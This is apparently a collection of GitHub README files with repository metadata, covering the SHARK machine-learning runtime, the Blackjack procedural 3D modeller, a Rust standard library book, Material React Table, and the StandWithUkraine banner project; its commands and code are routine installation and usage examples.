</details>
### Quick Start for SHARK Stable Diffusion for Windows 10/11 Users
Install the Driver from (Prerequisites)[https://github.com/nod-ai/SHARK#install-your-hardware-drivers] above
Download the [stable release](https://github.com/nod-ai/shark/releases/latest) or the most recent [SHARK 1.0 pre-release](https://github.com/nod-ai/shark/releases).
Double click the .exe, or [run from the command line](#running) (recommended), and you should have the [UI](http://localhost:8080/) in the browser.
If you have custom models put them in a `models/` directory where the .exe is.
Enjoy.
<details>
<summary>More installation notes</summary>
* We recommend that you download EXE in a new folder, whenever you download a new EXE version. If you download it in the same folder as a previous install, you must delete the old `*.vmfb` files with `rm *.vmfb`. You can also use `--clear_all` flag once to clean all the old files.
* If you recently updated the driver or this binary (EXE file), we recommend you clear all the local artifacts with `--clear_all`
## Running
* Open a Command Prompt or Powershell terminal, change folder (`cd`) to the .exe folder. Then run the EXE from the command prompt. That way, if an error occurs, you'll be able to cut-and-paste it to ask for help. (if it always works for you without error, you may simply double-click the EXE)
* The first run may take few minutes when the models are downloaded and compiled. Your patience is appreciated. The download could be about 5GB.
* You will likely see a Windows Defender message asking you to give permission to open a web server port. Accept it.
* Open a browser to access the Stable Diffusion web server. By default, the port is 8080, so you can go to http://localhost:8080/.
* If you prefer to always run in the browser, use the `--ui=web` command argument when running the EXE.
## Stopping
* Select the command prompt that's running the EXE. Press CTRL-C and wait a moment or close the terminal.
</details>
<details>
<summary>Advanced Installation (Only for developers)</summary>
## Advanced Installation (Windows, Linux and macOS) for developers
### Windows 10/11 Users
* Install Git for Windows from [here](https://git-scm.com/download/win) if you don't already have it.
## Check out the code
```shell
git clone https://github.com/nod-ai/SHARK.git
cd SHARK
```
## Switch to the Correct Branch (IMPORTANT!)
Currently SHARK is being rebuilt for [Turbine](https://github.com/nod-ai/SHARK-Turbine) on the `main` branch. For now you are strongly discouraged from using `main` unless you are working on the rebuild effort, and should not expect the code there to produce a working application for Image Generation, So for now you'll need switch over to the `SHARK-1.0` branch and use the stable code.
```shell
git checkout SHARK-1.0
```
The following setup instructions assume you are on this branch.
## Setup your Python VirtualEnvironment and Dependencies
### Windows 10/11 Users
* Install the latest Python 3.11.x version from [here](https://www.python.org/downloads/windows/)
#### Allow the install script to run in Powershell
```powershell
set-executionpolicy remotesigned
```
#### Setup venv and install necessary packages (torch-mlir, nodLabs/Shark, ...)
```powershell
./setup_venv.ps1 #You can re-run this script to get the latest version
```
### Linux / macOS Users
```shell
./setup_venv.sh
source shark1.venv/bin/activate
```
### Run Stable Diffusion on your device - WebUI
#### Windows 10/11 Users
```powershell
(shark1.venv) PS C:\g\shark> cd .\apps\stable_diffusion\web\
(shark1.venv) PS C:\g\shark\apps\stable_diffusion\web> python .\index.py
```
#### Linux / macOS Users
```shell
(shark1.venv) > cd apps/stable_diffusion/web
(shark1.venv) > python index.py
```
#### Access Stable Diffusion on http://localhost:8080/?__theme=dark
<img width="1607" alt="webui" src="https://user-images.githubusercontent.com/74956/204939260-b8308bc2-8dc4-47f6-9ac0-f60b66edab99.png">
### Run Stable Diffusion on your device - Commandline
#### Windows 10/11 Users
```powershell
(shark1.venv) PS C:\g\shark> python .\apps\stable_diffusion\scripts\main.py --app="txt2img" --precision="fp16" --prompt="tajmahal, snow, sunflowers, oil on canvas" --device="vulkan"
```
#### Linux / macOS Users
```shell
python3.11 apps/stable_diffusion/scripts/main.py --app=txt2img --precision=fp16 --device=vulkan --prompt="tajmahal, oil on canvas, sunflowers, 4k, uhd"
```
You can replace `vulkan` with `cpu` to run on your CPU or with `cuda` to run on CUDA devices. If you have multiple vulkan devices you can address them with `--device=vulkan://1` etc
</details>
The output on a AMD 7900XTX would look something like:
```shell
Average step time: 47.19188690185547ms/it
Clip Inference time (ms) = 109.531
VAE Inference time (ms): 78.590
Total image generation time: 2.5788655281066895sec
```
Here are some samples generated:
![tajmahal, snow, sunflowers, oil on canvas_0](https://user-images.githubusercontent.com/74956/204934186-141f7e43-6eb2-4e89-a99c-4704d20444b3.jpg)
![a photo of a crab playing a trumpet](https://user-images.githubusercontent.com/74956/204933258-252e7240-8548-45f7-8253-97647d38313d.jpg)
Find us on [SHARK Discord server](https://discord.gg/RUqY2h2s9u) if you have any trouble with running it on your hardware.
<details>
<summary>Binary Installation</summary>
### Setup a new pip Virtual Environment
This step sets up a new VirtualEnv for Python
```shell
python --version #Check you have 3.11 on Linux, macOS or Windows Powershell
python -m venv shark_venv
source shark_venv/bin/activate # Use shark_venv/Scripts/activate on Windows
# If you are using conda create and activate a new conda env
# Some older pip installs may not be able to handle the recent PyTorch deps
python -m pip install --upgrade pip
```
*macOS Metal* users please install https://sdk.lunarg.com/sdk/download/latest/mac/vulkan-sdk.dmg and enable "System wide install"
### Install SHARK
This step pip installs SHARK and related packages on Linux Python 3.8, 3.10 and 3.11 and macOS / Windows Python 3.11
```shell
pip install nodai-shark -f https://nod-ai.github.io/SHARK/package-index/ -f https://llvm.github.io/torch-mlir/package-index/ -f https://nod-ai.github.io/SRT/pip-release-links.html --extra-index-url https://download.pytorch.org/whl/nightly/cpu
```
### Run shark tank model tests.
```shell
pytest tank/test_models.py
```
See tank/README.md for a more detailed walkthrough of our pytest suite and CLI.
### Download and run Resnet50 sample
```shell
curl -O https://raw.githubusercontent.com/nod-ai/SHARK/main/shark/examples/shark_inference/resnet50_script.py
#Install deps for test script
pip install --pre torch torchvision torchaudio tqdm pillow gsutil --extra-index-url https://download.pytorch.org/whl/nightly/cpu
python ./resnet50_script.py --device="cpu" #use cuda or vulkan or metal
```
### Download and run BERT (MiniLM) sample
```shell
curl -O https://raw.githubusercontent.com/nod-ai/SHARK/main/shark/examples/shark_inference/minilm_jit.py
#Install deps for test script
pip install transformers torch --extra-index-url https://download.pytorch.org/whl/nightly/cpu
python ./minilm_jit.py --device="cpu" #use cuda or vulkan or metal
```
</details>
<details>
<summary>Development, Testing and Benchmarks</summary>
If you want to use Python3.11 and with TF Import tools you can use the environment variables like:
Set `USE_IREE=1` to use upstream IREE
```
# PYTHON=python3.11 VENV_DIR=0617_venv IMPORTER=1 ./setup_venv.sh
```
### Run any of the hundreds of SHARK tank models via the test framework
```shell
python -m shark.examples.shark_inference.resnet50_script --device="cpu" # Use gpu | vulkan
# Or a pytest
pytest tank/test_models.py -k "MiniLM"
```
### How to use your locally built IREE / Torch-MLIR with SHARK
If you are a *Torch-mlir developer or an IREE developer* and want to test local changes you can uninstall
the provided packages with `pip uninstall torch-mlir` and / or `pip uninstall iree-compiler iree-runtime` and build locally
with Python bindings and set your PYTHONPATH as mentioned [here](https://github.com/iree-org/iree/tree/main/docs/api_docs/python#install-iree-binaries)
for IREE and [here](https://github.com/llvm/torch-mlir/blob/main/development.md#setup-python-environment-to-export-the-built-python-packages)
for Torch-MLIR.
How to use your locally built Torch-MLIR with SHARK:
```shell
1.) Run `./setup_venv.sh in SHARK` and activate `shark.venv` virtual env.
2.) Run `pip uninstall torch-mlir`.
3.) Go to your local Torch-MLIR directory.
4.) Activate mlir_venv virtual envirnoment.
5.) Run `pip uninstall -r requirements.txt`.
6.) Run `pip install -r requirements.txt`.
7.) Build Torch-MLIR.
8.) Activate shark.venv virtual environment from the Torch-MLIR directory.
8.) Run `export PYTHONPATH=`pwd`/build/tools/torch-mlir/python_packages/torch_mlir:`pwd`/examples` in the Torch-MLIR directory.
9.) Go to the SHARK directory.
```
Now the SHARK will use your locally build Torch-MLIR repo.
## Benchmarking Dispatches
To produce benchmarks of individual dispatches, you can add `--dispatch_benchmarks=All --dispatch_benchmarks_dir=<output_dir>` to your pytest command line argument.
If you only want to compile specific dispatches, you can specify them with a space seperated string instead of `"All"`. E.G. `--dispatch_benchmarks="0 1 2 10"`
For example, to generate and run dispatch benchmarks for MiniLM on CUDA:
```
pytest -k "MiniLM and torch and static and cuda" --benchmark_dispatches=All -s --dispatch_benchmarks_dir=./my_dispatch_benchmarks
```
The given command will populate `<dispatch_benchmarks_dir>/<model_name>/` with an `ordered_dispatches.txt` that lists and orders the dispatches and their latencies, as well as folders for each dispatch that contain .mlir, .vmfb, and results of the benchmark for that dispatch.
if you want to instead incorporate this into a python script, you can pass the `dispatch_benchmarks` and `dispatch_benchmarks_dir` commands when initializing `SharkInference`, and the benchmarks will be generated when compiled. E.G:
```
shark_module = SharkInference(
mlir_model,
device=args.device,
mlir_dialect="tm_tensor",
dispatch_benchmarks="all",
dispatch_benchmarks_dir="results"
)
```
Output will include:
- An ordered list ordered-dispatches.txt of all the dispatches with their runtime
- Inside the specified directory, there will be a directory for each dispatch (there will be mlir files for all dispatches, but only compiled binaries and benchmark data for the specified dispatches)
- An .mlir file containing the dispatch benchmark
- A compiled .vmfb file containing the dispatch benchmark
- An .mlir file containing just the hal executable
- A compiled .vmfb file of the hal executable
- A .txt file containing benchmark output
See tank/README.md for further instructions on how to run model tests and benchmarks from the SHARK tank.
</details>
<details>
<summary>API Reference</summary>
### Shark Inference API
```
from shark.shark_importer import SharkImporter
# SharkImporter imports mlir file from the torch, tensorflow or tf-lite module.
mlir_importer = SharkImporter(
torch_module,
(input),
frontend="torch", #tf, #tf-lite
)
torch_mlir, func_name = mlir_importer.import_mlir(tracing_required=True)
# SharkInference accepts mlir in linalg, mhlo, and tosa dialect.
from shark.shark_inference import SharkInference
shark_module = SharkInference(torch_mlir, device="cpu", mlir_dialect="linalg")
shark_module.compile()
result = shark_module.forward((input))
```
### Example demonstrating running MHLO IR.
```
from shark.shark_inference import SharkInference
import numpy as np
mhlo_ir = r"""builtin.module {
func.func @forward(%arg0: tensor<1x4xf32>, %arg1: tensor<4x1xf32>) -> tensor<4x4xf32> {
%0 = chlo.broadcast_add %arg0, %arg1 : (tensor<1x4xf32>, tensor<4x1xf32>) -> tensor<4x4xf32>
%1 = "mhlo.abs"(%0) : (tensor<4x4xf32>) -> tensor<4x4xf32>
return %1 : tensor<4x4xf32>
}
}"""
arg0 = np.ones((1, 4)).astype(np.float32)
arg1 = np.ones((4, 1)).astype(np.float32)
shark_module = SharkInference(mhlo_ir, device="cpu", mlir_dialect="mhlo")
shark_module.compile()
result = shark_module.forward((arg0, arg1))
```
</details>
## Examples Using the REST API
* [Setting up SHARK for use with Blender](./docs/shark_sd_blender.md)
* [Setting up SHARK for use with Koboldcpp](./docs/shark_sd_koboldcpp.md)
## Supported and Validated Models
SHARK is maintained to support the latest innovations in ML Models:
| TF HuggingFace Models | SHARK-CPU | SHARK-CUDA | SHARK-METAL |
|---------------------|----------|----------|-------------|
| BERT | :green_heart: | :green_heart: | :green_heart: |
| DistilBERT | :green_heart: | :green_heart: | :green_heart: |
| GPT2 | :green_heart: | :green_heart: | :green_heart: |
| BLOOM | :green_heart: | :green_heart: | :green_heart: |
| Stable Diffusion | :green_heart: | :green_heart: | :green_heart: |
| Vision Transformer | :green_heart: | :green_heart: | :green_heart: |
| ResNet50 | :green_heart: | :green_heart: | :green_heart: |
For a complete list of the models supported in SHARK, please refer to [tank/README.md](https://github.com/nod-ai/SHARK/blob/main/tank/README.md).
## Communication Channels
* [SHARK Discord server](https://discord.gg/RUqY2h2s9u): Real time discussions with the SHARK team and other users
* [GitHub issues](https://github.com/nod-ai/SHARK/issues): Feature requests, bugs etc
## Related Projects
<details>
<summary>IREE Project Channels</summary>
* [Upstream IREE issues](https://github.com/google/iree/issues): Feature requests,
bugs, and other work tracking
* [Upstream IREE Discord server](https://discord.gg/wEWh6Z9nMU): Daily development
discussions with the core team and collaborators
* [iree-discuss email list](https://groups.google.com/forum/#!forum/iree-discuss):
Announcements, general and low-priority discussion
</details>
<details>
<summary>MLIR and Torch-MLIR Project Channels</summary>
* `#torch-mlir` channel on the LLVM [Discord](https://discord.gg/xS7Z362) - this is the most active communication channel
* Torch-MLIR Github issues [here](https://github.com/llvm/torch-mlir/issues)
* [`torch-mlir` section](https://llvm.discourse.group/c/projects-that-want-to-become-official-llvm-projects/torch-mlir/41) of LLVM Discourse
* Weekly meetings on Mondays 9AM PST. See [here](https://discourse.llvm.org/t/community-meeting-developer-hour-refactoring-recurring-meetings/62575) for more information.
* [MLIR topic within LLVM Discourse](https://llvm.discourse.group/c/llvm-project/mlir/31) SHARK and IREE is enabled by and heavily relies on [MLIR](https://mlir.llvm.org).
</details>
## License
nod.ai SHARK is licensed under the terms of the Apache 2.0 License with LLVM Exceptions.
See [LICENSE](LICENSE) for more information.
| SHARK - High Performance Machine Learning Distribution | deep-learning,machine-learning,mlir,pytorch,amd,apple-silicon,nvidia | 672 | 86 | 1,557 | 1,743 | 348 | 59 | 3 |
setzer22/blackjack | <p align="center">
<img src="https://user-images.githubusercontent.com/7241990/178050668-b4e6fbba-dde2-4688-800a-e1a8458520a0.svg">
</p>
> Your Rusty 🦀 procedural 3d modeler
![GitHub CI](https://github.com/setzer22/blackjack/actions/workflows/ci.yml/badge.svg)
![MPL](https://img.shields.io/badge/license-MPL%202%2E0-blue.svg)
**ARCHIVED REPOSITORY** This repository is now archived because of a variety of technical and political reasons that made me loose my motivation to continue contributing to the Rust community in my free time.
**Blackjack** is a procedural modelling application, following the steps of great tools like [Houdini](https://www.sidefx.com/) or [Blender's geometry nodes project](https://docs.blender.org/manual/en/latest/modeling/geometry_nodes/index.html). At its core, Blackjack is a simple node-driven interface where you can compose operations to create a 3d mesh in a non-destructive way.
![Main interaface of Blackjack](https://user-images.githubusercontent.com/7241990/178053206-94f4e976-984c-4611-9d63-d591d231b014.png)
![Another gif showcasing procedural modelling in Blackjack](https://user-images.githubusercontent.com/7241990/178054513-75232c00-7bd0-4e26-9474-ab2b71960c6e.gif)
![A third gif showcasing procedural modelling in Blackjack](https://user-images.githubusercontent.com/7241990/178053667-9e72131c-bb2b-4ffa-aab9-afdf5c51033e.gif)
![Gif showcasing procedural modelling in Blackjack](./doc/resources/blackjack_gif3.gif)
## Features and goals
Blackjack **does not aim to replace an industry powerhouse such as Houdini**. Instead, it aims to provide a less cluttered, more robust and user-friendly experience for a small subset of the features that make these tools a great fit in the world of game development and real-time simulations.
Here are the main goals and philosophy behind blackjack, but note that this shows the direction where things are going, not their current state.
- **Procedural polygonal modelling, first and foremost**: The main focus in Blackjack is the creation of low-poly procedural assets like the ones one would see in videogames. In particular, surface extraction of volumetric data is not among its goals.
- **Flexible node-based interface:** Build complex node graphs, create reusable functions, and tweak every parameter in real-time!
- **Integration with popular game engines:** Export your procedural assets as tiny programs and tweak their parameters at runtime by adding a simple library to your engine of choice.
- **Error resilience, crash resistance:** When things go wrong, Blackjack will make an effort to *respect your time* as a user and not lose your work. Errors will be clearly communicated and fixing any bugs leading to a crash will take the highest priority.
## Install and usage
> **Note**: A crates.io version cannot be published due to unreleased dependencies. Blackjack depends on the bleeding edge version of some crates and requires custom forks for some others. This situation may change once development stabilizes.
Here are the steps in order to try out the early development version of Blackjack. Binaries and easier installation methods will be provided in the future. The steps below require a complete Rust toolchain using `cargo`, with a minimum supported Rust version (MSRV) of **1.62.0**.
1. Clone this repository, and make sure to download LFS files. In some systems, this may require separately installing a `git-lfs`[^1] package:
```bash
git clone https://github.com/setzer22/blackjack
git lfs install
git lfs fetch --all
git lfs pull
```
[^1]: Linux users can install `git-lfs` with their distro's package manager (`apt install git-lfs` / `yum install git-lfs` / `pacman -S git-lfs`). MacOS users using homebrew can use `brew install git-lfs`. Other users should follow the [git-lfs install instructions](https://git-lfs.github.com/).
2. Install build dependencies. This may not cover everything, please file an issue or a pull request if you find anything missing:
* Ubuntu/Debian: `sudo apt install libfontconfig-dev`
* Arch Linux: `sudo pacman -S fontconfig`
* Fedora: `sudo dnf install fontconfig-devel`
> **Note**: The `fontconfig` native dependency is temporary, and will no longer be necessary once this upstream issue is fixed: https://github.com/rust-windowing/winit/issues/2373
3. From the same folder, run `cargo run --release --bin blackjack_ui` to launch Blackjack.
### Usage
Some minimal usage instructions. Please do note that these can and will change frequently during early development:
- The bottom section of the screen is the node graph.
- Use right click to open the node selector. Find a node and spawn it by clicking on it. You can also use the search bar.
- Nodes can be dragged around, and its widgets interacted with using the mouse.
- Dragging the mouse between two nodes' ports will create a connection.
- Use the 'Set active' button under a node to make it render to the screen.
## Tech stack
Blackjack is built using Rust 🦀 and stands on the shoulders of giants. Here's a shout out to some great rust crates being used in this project:
- [rend3](https://github.com/BVE-Reborn/rend3) is used for all rendering purposes.
- [egui](https://github.com/emilk/egui) is used as the UI toolkit powering all 2d interaction.
- [wgpu](https://github.com/gfx-rs/wgpu), as the base of `rend3`, is used for all custom visual effects.
- [mlua](https://github.com/khvzak/mlua) is used to integrate [Luau](https://github.com/Roblox/luau) as an extension language.
## Tool Maturity
Blackjack is still under active development. Many features are missing and are bound to change. For now, **no promises are made with regards to stability**, but API breakage will be considered only when absolutely necessary.
## Contributing
Contributions are welcome! Before writing a PR, please get in touch by filing an issue 😄
| A procedural, node-based modelling tool, made in rust 🦀 | null | 1 | 9 | 49 | 503 | 25 | 37 | 2 |
Warrenren/inside-rust-std-library | # inside-rust-std-library
实体书已经出版,名字为《深入rust标准库》,正在预售,可在京东搜索到。欢迎大家采购实体书籍,给作者一些支持。
本书主要对RUST的标准库代码进行分析。
本书尽可能给读者找出一条标准库代码的阅读脉络。同时,分析不仅仅针对代码的功能,也针对代码背后的需求及若干代码设计的思路。
C语言精通的标志是对指针的精通。RUST的裸指针也是RUST的最基础及最核心的难点之一。
所以,将裸指针及相关的内存模块作为代码分析的起始点,熟悉了裸指针及内存,自然也就对所有权,借用,生命周期的本质有了深刻的理解,RUST语言的最难关便过了。
泛型是RUST不可分割的语法之一,而对于其他语言,没有泛型不影响语言的使用。泛型及基于trait的泛型约束是RUST的另一个代码基础。
针对基本类型的分析,可以看到RUST利用trait语法使之具备了无限的扩展性,这是RUST更有表现力的语法能力的展现。
Option<T>/Result<T,E>等类型实际完全是由标准库定义的,并不是RUST语言最底层的基本内容,可以从代码分析中发现这一点。
所有的运算符都可以重载,且可以跨越类型重载,RUST的运算符重载揭示了RUST很多的编码奥秘及技巧。
Iterator加闭包是函数式编程的基础构架,Iterator的适配器构成了函数式编程的基础设施,RUST完整的实现了这些内容,并且几乎为每个类型都实现了迭代器,并尽可能的为函数式编程做好了准备。
Cell<T>/RefCell<T>/Pin<T>/Lazy<T>代码证明了在RUST的基础语法下,如何创造性的解决问题。
Box<T>/RawVec<T>是两个堆内存申请的基本结构,善用这两个结构,除非写内存管理,基本上就不必再接触底层的堆内存申请及释放。
每一个智能指针实际上也是RUST对经典的数据结构实现的精妙例程。
RUST对不同操作系统的适配让程序员不必象C那样再重复的耗费精力并且还沾沾自喜于此份工作。
仅支持异步编程的async/await,Future也体现了RUST的作最基础的工作的态度。
...
...
(This book focuses on the analysis of RUST's standard library code.
This book is as far as possible to find a reading context for the standard library code. At the same time, the analysis is not only for the function of the code, but also for the requirements behind the code and some ideas of code design.
The hallmark of C proficiency is mastery of pointer. The raw pointer in RUST is also one of the most basic and core difficulties of RUST. Therefor, the raw pointer and associated memory modules are used as the starting point for code analysis, and the familiarity with raw pointer and memory naturally leads to a profound understanding of the nature of ownership, borrowing, and the life cycle. The hardest part of RUST is over.
Generics are an integral part of RUST's syntax, and for other languages, the absence of generics does not affect language use. Generics and their trait - based generic constraints are another code base of RUST.
Based on the analysis of primitive types, it can be seen that RUST makes use of trait syntax to make primitive types infinitely extensible, which is a demonstration of RUST's more expressive syntax ability.
Types such as Option<T>/Result<T, E> are actually defined entirely by the standard library and are not the basic content of the lowest level of the RUST language, as you can see from code analysis.
All operators can be overloaded and can cross type overloading. Operator overloading in RUST reveals many of RUST's coding secrets and tricks.
Iterator plus closures are the foundation of functional programming. The adapters of Iterator make up the infrastructure of functional programming. RUST implements them completely, implementing iterators for almost every type and preparing them as well as possible for functional programming.
The Cell/RefCell/Pin/Lazy source code demonstrates how creative problem solving can be done within RUST's basic syntax.
Box/RawVec are the two basic structures of heap memory allocation and freeing.
Each smart pointer is actually an elegant routine of RUST's implementation of classical data structures.
RUST's adaptation of different operating systems saves programmers from the repetitive effort and complacency of C.
Supporting only async/await for asynchronous programming, Future also embodies RUST's attitude of doing the most basic work.
...
...
)
| 本书已经正式出版,目前正预售,可在京东搜索《深入RUST标准库》即可。本书主要对RUST的标准库代码进行分析,并试图给出RUST标准库代码的分析脉络。This project try to give a venation of how reading the RUST standard library source code. | null | 0 | 1 | 6 | 137 | 7 | 1 | 0 |
KevinVandy/material-react-table | # Material React Table V2
View [Documentation](https://www.material-react-table.com/)
<a href="https://npmjs.com/package/material-react-table" target="_blank">
<img alt="" src="https://badgen.net/npm/v/material-react-table?color=blue" />
</a>
<a href="https://npmtrends.com/material-react-table" target="_blank">
<img alt="" src="https://badgen.net/npm/dt/material-react-table?label=installs&icon=npm&color=blue" />
</a>
<a href="https://bundlephobia.com/result?p=material-react-table" target="_blank">
<img alt="" src="https://badgen.net/bundlephobia/minzip/material-react-table@latest?color=blue" />
</a>
<a href="https://star-history.com/#kevinvandy/material-react-table&Date" target="_blank">
<img alt="" src="https://badgen.net/github/stars/KevinVandy/material-react-table?color=blue" />
</a>
<a href="https://github.com/KevinVandy/material-react-table/blob/v2/LICENSE" target="_blank">
<img alt="" src="https://badgen.net/github/license/KevinVandy/material-react-table?color=blue" />
</a>
<a
href="https://github.com/sponsors/kevinvandy"
target="_blank"
rel="noopener"
>
<img alt="" src="https://img.shields.io/badge/sponsor-violet" />
</a>
<a
href="https://discord.gg/5wqyRx6fnm"
target="_blank"
rel="noopener"
>
<img alt="" src="https://dcbadge.vercel.app/api/server/5wqyRx6fnm?style=flat">
</a>
## About
### _Quickly Create React Data Tables with Material Design_
### **Built with [Material UI <sup>V5</sup>](https://mui.com) and [TanStack Table <sup>V8</sup>](https://tanstack.com/table/v8)**
<img src="https://material-react-table.com/banner.png" alt="MRT" height="50" />
> Want to use Mantine instead of Material UI? Check out [Mantine React Table](https://www.mantine-react-table.com)
## Learn More
- Join the [Discord](https://discord.gg/5wqyRx6fnm) server to join in on the development discussion or ask questions
- View the [Docs Website](https://www.material-react-table.com/)
- See all [Props, Options, APIs, Components, and Hooks](https://www.material-react-table.com/docs/api)
### Quick Examples
- [Basic Table](https://www.material-react-table.com/docs/examples/basic/) (See Default Features)
- [Minimal Table](https://www.material-react-table.com/docs/examples/minimal/) (Turn off Features like Pagination, Sorting, Filtering, and Toolbars)
- [Advanced Table](https://www.material-react-table.com/docs/examples/advanced/) (See some of the Advanced Features)
- [Custom Headless Table](https://www.material-react-table.com/docs/examples/custom-headless/) (Build your own table markup)
- [Dragging / Ordering Examples](https://www.material-react-table.com/docs/examples/column-ordering/) (Drag and Drop)
- [Editing (CRUD) Examples](https://www.material-react-table.com/docs/examples/editing-crud/) (Create, Edit, and Delete Rows)
- [Expanding / Grouping Examples](https://www.material-react-table.com/docs/examples/aggregation-and-grouping/) (Sum, Average, Count, etc.)
- [Filtering Examples](https://www.material-react-table.com/docs/examples/filter-variants/) (Faceted Values, Switching Filters, etc.)
- [Sticky Pinning Examples](https://www.material-react-table.com/docs/examples/sticky-header/) (Sticky Headers, Sticky Columns, Sticky Rows, etc.)
- [Remote Data Fetching Examples](https://www.material-react-table.com/docs/examples/react-query/) (Server-side Pagination, Sorting, and Filtering)
- [Virtualized Examples](https://www.material-react-table.com/docs/examples/virtualized/) (10,000 rows at once!)
- [Infinite Scrolling](https://www.material-react-table.com/docs/examples/infinite-scrolling/) (Fetch data as you scroll)
- [Localization (i18n)](https://www.material-react-table.com/docs/guides/localization#built-in-locale-examples) (Over a dozen languages built-in)
View additional [storybook examples](https://www.material-react-table.dev/)
## Features
_All features can easily be enabled/disabled_
_**Fully Fleshed out [Docs](https://www.material-react-table.com/docs/guides#guides) are available for all features**_
- [x] 30-56kb gzipped - [Bundlephobia](https://bundlephobia.com/package/material-react-table)
- [x] Advanced TypeScript Generics Support (TypeScript Optional)
- [x] Aggregation and Grouping (Sum, Average, Count, etc.)
- [x] Cell Actions (Right-click Context Menu)
- [x] Click To Copy Cell Values
- [x] Column Action Dropdown Menu
- [x] Column Hiding
- [x] Column Ordering via Drag'n'Drop
- [x] Column Pinning (Freeze Columns)
- [x] Column Resizing
- [x] Customize Icons
- [x] Customize Styling of internal Mui Components
- [x] Data Editing and Creating (5 different editing modes)
- [x] Density Toggle
- [x] Detail Panels (Expansion)
- [x] Faceted Value Generation for Filter Options
- [x] Filtering (supports client-side and server-side)
- [x] Filter Match Highlighting
- [x] Full Screen Mode
- [x] Global Filtering (Search across all columns, rank by best match)
- [x] Header Groups & Footers
- [x] Localization (i18n) support
- [x] Manage your own state or let the table manage it internally for you
- [x] Pagination (supports client-side and server-side)
- [x] Row Actions (Your Custom Action Buttons)
- [x] Row Numbers
- [x] Row Ordering via Drag'n'Drop
- [x] Row Pinning
- [x] Row Selection (Checkboxes)
- [x] SSR compatible
- [x] Sorting (supports client-side and server-side)
- [x] Theming (Respects your Material UI Theme)
- [x] Toolbars (Add your own action buttons)
- [x] Tree Data / Expanding Sub-rows
- [x] Virtualization (@tanstack/react-virtual)
## Getting Started
### Installation
View the full [Installation Docs](https://www.material-react-table.com/docs/getting-started/install)
1. Ensure that you have React 18 or later installed
2. Install Peer Dependencies (Material UI V5)
```bash
npm install @mui/material @mui/x-date-pickers @mui/icons-material @emotion/react @emotion/styled
```
3. Install material-react-table
```bash
npm install material-react-table
```
> _`@tanstack/react-table`, `@tanstack/react-virtual`, and `@tanstack/match-sorter-utils`_ are internal dependencies, so you do NOT need to install them yourself.
### Usage
> Read the full usage docs [here](https://www.material-react-table.com/docs/getting-started/usage/)
```jsx
import { useMemo, useState, useEffect } from 'react';
import {
MaterialReactTable,
useMaterialReactTable,
} from 'material-react-table';
//data must be stable reference (useState, useMemo, useQuery, defined outside of component, etc.)
const data = [
{
name: 'John',
age: 30,
},
{
name: 'Sara',
age: 25,
},
];
export default function App() {
const columns = useMemo(
() => [
{
accessorKey: 'name', //simple recommended way to define a column
header: 'Name',
muiTableHeadCellProps: { sx: { color: 'green' } }, //optional custom props
Cell: ({ cell }) => <span>{cell.getValue()}</span>, //optional custom cell render
},
{
accessorFn: (row) => row.age, //alternate way
id: 'age', //id required if you use accessorFn instead of accessorKey
header: 'Age',
Header: () => <i>Age</i>, //optional custom header render
},
],
[],
);
//optionally, you can manage any/all of the table state yourself
const [rowSelection, setRowSelection] = useState({});
useEffect(() => {
//do something when the row selection changes
}, [rowSelection]);
const table = useMaterialReactTable({
columns,
data,
enableColumnOrdering: true, //enable some features
enableRowSelection: true,
enablePagination: false, //disable a default feature
onRowSelectionChange: setRowSelection, //hoist internal state to your own state (optional)
state: { rowSelection }, //manage your own state, pass it back to the table (optional)
});
const someEventHandler = () => {
//read the table state during an event from the table instance
console.log(table.getState().sorting);
};
return (
<MaterialReactTable table={table} /> //other more lightweight MRT sub components also available
);
}
```
_Open in [Code Sandbox](https://codesandbox.io/s/simple-material-react-table-example-t5c3ji)_
## Contributors
<a href="https://github.com/kevinvandy/material-react-table/graphs/contributors">
<img src="https://contrib.rocks/image?repo=kevinvandy/material-react-table" />
</a>
PRs are Welcome, but please discuss in [GitHub Discussions](https://github.com/KevinVandy/material-react-table/discussions) or the [Discord Server](https://discord.gg/5wqyRx6fnm) first if it is a large change!
Read the [Contributing Guide](https://github.com/KevinVandy/material-react-table/blob/v2/CONTRIBUTING.md) to learn how to run this project locally.
<!-- Use the FORCE, Luke! -->
| A fully featured Material UI V5 implementation of TanStack React Table V8, written from the ground up in TypeScript | react,typescript,react-table,material-table,material-ui,data-table,tanstack,datagrid | 140 | 98 | 245 | 1,469 | 58 | 3 | 2 |
vshymanskyy/StandWithUkraine | [![GitHub stars](https://img.shields.io/github/stars/vshymanskyy/StandWithUkraine.svg)](https://github.com/vshymanskyy/StandWithUkraine/stargazers)
[![GitHub issues](https://img.shields.io/github/issues/vshymanskyy/StandWithUkraine.svg)](https://github.com/vshymanskyy/StandWithUkraine/issues)
[![StandWithUkraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/badges/StandWithUkraine.svg)](https://github.com/vshymanskyy/StandWithUkraine/blob/main/docs/README.md)
This repository contains **Readme Banners** (and some useful docs) that can be used by OSS projects to spread the word, support and help Ukraine in this disastrous situation. Like this **(click to open)**:
[![Stand With Ukraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner2-direct.svg)](https://vshymanskyy.github.io/StandWithUkraine/)
### 📢 [Updates from Ukrainian Open Source Community](/docs/CommunityUpdates.md)
### 🇷🇺 [Обращение к гражданам России](/docs/ToRussianPeople.md)
## For Maintainers and Authors
1. Spread the word. [Add one of the banners](/docs/AddBanner.md) to your **`README.md`**. Badges are also available
2. Get rid of [Russian software and dependencies](/docs/Boycott.md)
3. Deliver [a message](https://github.com/vshymanskyy/StandWithUkraine/blob/main/docs/ToRussianPeople.md) to your users (esp. those in Russia) along with your next release. See [example here](https://github.com/vshymanskyy/StandWithUkraine/issues/4)
4. Follow the [cyber safety guide](/docs/CyberSafety.md)
## Projects that #StandWithUkraine
- [AssemblyScript](https://github.com/AssemblyScript/assemblyscript) - A variant of TypeScript that compiles to WebAssembly using Binaryen
- [Awesome](https://github.com/sindresorhus/awesome) - Awesome lists about all kinds of interesting topics
- [MacPaw](https://github.com/MacPaw) - A company behind prominent Mac software: CleanMyMac X, Setapp, Gemini 2, The Unarchiver
- [AVA.js](https://github.com/avajs/ava) - A test runner for Node.js that lets you develop with confidence
- [Wasm3](https://github.com/wasm3) - WebAssembly engine
- [Rete.js](https://github.com/retejs/rete) - JavaScript framework for visual programming
- [Blynk](https://github.com/blynkkk/blynk-library) - IoT platform
- [pnpm](https://github.com/pnpm/pnpm) - Fast, disk space efficient package manager
- [PlatformIO](https://github.com/platformio/platformio-core) - A professional collaborative platform for embedded development
